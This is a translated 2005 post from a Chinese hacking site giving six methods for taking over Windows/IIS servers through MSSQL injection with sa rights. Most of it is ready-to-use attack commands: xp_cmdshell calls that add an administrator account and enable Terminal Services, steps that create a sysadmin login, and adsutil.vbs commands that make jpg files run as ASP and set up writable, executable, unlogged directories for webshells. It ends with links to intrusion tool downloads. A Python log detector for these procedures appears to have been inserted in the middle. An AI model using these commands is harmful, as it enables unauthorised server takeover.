Alternative ideas for successfully intruding into an MSSQL database - vulnerability warning - Black Bar Security Net (黑吧安全网)

2005-11-07T00:00:00
ID MYHACK58:6220054342
Type myhack58
Reporter Anonymous
Modified 2005-11-07T00:00:00

Description

Exploiting sa through MSSQL injection

Database and website on the same server:

Method one:

Open Terminal Services (TS) and add an account on the box; the specific statements are as follows:

;exec master.dbo.xp_cmdshell '@echo [Components] > c:\sql'
;exec master.dbo.xp_cmdshell '@echo TSEnable = on >> c:\sql'
;exec master.dbo.xp_cmdshell '@sysocmgr /i:c:\winnt\inf\sysoc.inf /u:c:\sql /q'
;exec master.dbo.xp_cmdshell '@del C:\server'

Exec Master..Xp_CmdShell 'net user linzi 1 2 3 /add'

Exec Master..Xp_CmdShell 'net localgroup administrators linzi /add'

Method two:

Have asp.dll parse the jpg format, then legitimately upload an asp Trojan through the upload point; this is mainly done with the Adsutil.vbs script.

The specific statements are:

cscript C:\Inetpub\AdminScripts\adsutil.vbs ENUM w3svc/3/root (to get its directory)

cscript c:\Inetpub\AdminScripts\adsutil.vbs SET W3SVC/3/Root/ScriptMaps ".jpg,c:\winnt\system32\inetsrv\asp.dll,5,GET,HEAD,POST,TRACE" ".asp,c:\winnt\system32\inetsrv\asp.dll,5,GET,HEAD,POST,TRACE" ".aspx,c:\winnt\Microsoft.NET\Framework\v1.1.4322\aspnet_isapi.dll,1,GET,HEAD,POST,DEBUG"

Method three:

Add a user with system permissions, then connect with Query Analyzer

Specific statements:

;exec master.dbo.sp_addlogin linzi;--

;exec master.dbo.sp_password null,linzi,linzi;--

;exec master.dbo.sp_addsrvrolemember linzi sysadmin;--

Method four:

An old hole used anew: reconstruct the original U vulnerability, then connect with a small write tool and upload

The specific statement is as follows:

;exec master.dbo.xp_cmdshell 'copy c:\winnt\system32\cmd.exe c:\inetpub\scripts\linzi.exe'

Method five:

Use Adsutil.vbs to create a directory with browse, write, execute and other permissions, then upload

The specific statements are as follows:

cscript c:\Inetpub\AdminScripts\adsutil.vbs CREATE W3SVC/1/Root/linzi "IIsWebVirtualDir"
cscript c:\Inetpub\AdminScripts\adsutil.vbs SET W3SVC/1/Root/linzi/AppIsolated 0
cscript c:\Inetpub\AdminScripts\adsutil.vbs SET W3SVC/1/Root/linzi/Path: "c:\"
cscript c:\Inetpub\AdminScripts\adsutil.vbs SET W3SVC/1/Root/linzi/AccessExecute 1
cscript c:\Inetpub\AdminScripts\adsutil.vbs SET W3SVC/1/Root/linzi/AccessSource 1
cscript c:\Inetpub\AdminScripts\adsutil.vbs SET W3SVC/1/Root/linzi/AccessRead 1
cscript c:\Inetpub\AdminScripts\adsutil.vbs SET W3SVC/1/Root/linzi/AccessScript 1
cscript c:\Inetpub\AdminScripts\adsutil.vbs SET W3SVC/1/Root/linzi/AccessWrite 1
cscript c:\Inetpub\AdminScripts\adsutil.vbs SET W3SVC/1/Root/linzi/ScriptMaps ".asp,c:\WINDOWS\system32\inetsrv\asp.dll,5,GET,HEAD,POST,TRACE" ".aspx,c:\WINDOWS\Microsoft.NET\Framework\v1.1.4322\aspnet_isapi.dll,1,GET,HEAD,POST,DEBUG"
cscript c:\Inetpub\AdminScripts\adsutil.vbs SET W3SVC/1/Root/linzi/DontLog 1
cscript c:\Inetpub\AdminScripts\adsutil.vbs SET W3SVC/1/Root/linzi/EnableDirBrowsing 1
cscript c:\Inetpub\AdminScripts\adsutil.vbs SET W3SVC/1/Root/linzi/EnableDefaultDoc 0

Then go to http://ip/linzi/

Method six:

Expose the web path, then write a small webshell (a "pony") or upload a Trojan, and use the copy command to change the extension to asp

The specific statements are as follows:

  1. Expose the directory:

;create table [dbo].[linzi] ([daya] char);--

;DECLARE @result varchar(255) EXEC master.dbo.xp_regread 'HKEY_LOCAL_MACHINE','SYSTEM\ControlSet001\Services\W3SVC\Parameters\Virtual Roots','/',@result output insert into linzi (daya) values(@result);--

and 1=(select top 1 daya from linzi)

  2. Rename the picture:

copy <image path>linzi.jpg <image path>linzi.asp

The six methods above can be said to be the more effective ones. Of course, intrusion methods for sa vary; the ones I personally use most are the few above, because those methods are enough for most sites. Well, when I have time I will continue to write about the attack methods for when the database is not on the same server. Tired ah!~~~ For details, watch the few animations I made. The method I personally use most often is to first open Terminal Services, then write a .vbs, then upload a port forwarding tool such as htran, forward to the public network and log in directly; it is all in the animation.
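A detection check from the defender's side, added here and not part of the original post: it normalizes request query strings the way an IIS access-log review would (URL decoding, whitespace collapsing) and flags the stacked-query primitives that the six methods above rely on (xp_cmdshell, sp_addlogin, sp_password, sp_addsrvrolemember, xp_regread). The sample requests and the names linzi and daya are constructed for the example, not taken from any real log.

```python
import re
from urllib.parse import unquote_plus

# Constructed sample requests (query strings as they would appear in an IIS
# access log), not from any real server. The first three mirror the stacked
# queries shown above; the last two are benign traffic.
SAMPLE_REQUESTS = [
    "/news.asp?id=12;exec+master..xp_cmdshell+'net+user+linzi+1+2+3+/add'--",
    "/news.asp?id=12%3Bexec%20master.dbo.sp_addsrvrolemember%20linzi%20sysadmin%3B--",
    "/news.asp?id=12;DECLARE+@result+varchar(255)+EXEC+master.dbo.xp_regread+"
    "'HKEY_LOCAL_MACHINE','SYSTEM\\ControlSet001\\Services\\W3SVC\\Parameters\\Virtual+Roots',"
    "'/',@result+output",
    "/news.asp?id=12",
    "/search.asp?q=master+password+reset",
]

# Extended and role-management procedures that an sa-level injection reaches.
DANGEROUS_PROCS = (
    "xp_cmdshell", "xp_regread", "xp_regwrite",
    "sp_addlogin", "sp_password", "sp_addsrvrolemember",
)
PROC_RE = re.compile(r"\b(" + "|".join(DANGEROUS_PROCS) + r")\b", re.IGNORECASE)

# A statement terminator followed by a new T-SQL verb marks a stacked query
# (";exec", ";create table", ";DECLARE"), which the injection points above use.
STACKED_RE = re.compile(r";\s*(exec(?:ute)?|declare|create|insert|drop)\b", re.IGNORECASE)


def normalize(request: str) -> str:
    """URL-decode twice (catches double encoding) and collapse whitespace."""
    decoded = unquote_plus(unquote_plus(request))
    return re.sub(r"\s+", " ", decoded)


def scan_request(request: str) -> list:
    """Return the indicator names found in one request; empty list if clean."""
    text = normalize(request)
    hits = []
    if STACKED_RE.search(text):
        hits.append("stacked-query")
    for match in PROC_RE.finditer(text):
        name = match.group(1).lower()
        if name not in hits:
            hits.append(name)
    return hits


def scan_log(requests) -> dict:
    """Map each suspicious request to its indicators; clean requests are omitted."""
    return {r: scan_request(r) for r in requests if scan_request(r)}
```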

Animation download: http://www.cnbct.org/bbs/dispbbs.asp?boardID=5&ID=52&page=1

For the second method, see the discussion area

Port forwarding intrusion into the internal network: http://www.cnbct.org/VIP-DOWN/入侵内网.rar

New use of the U vulnerability: http://www.cnbct.org/VIP-DOWN/sa-up.rar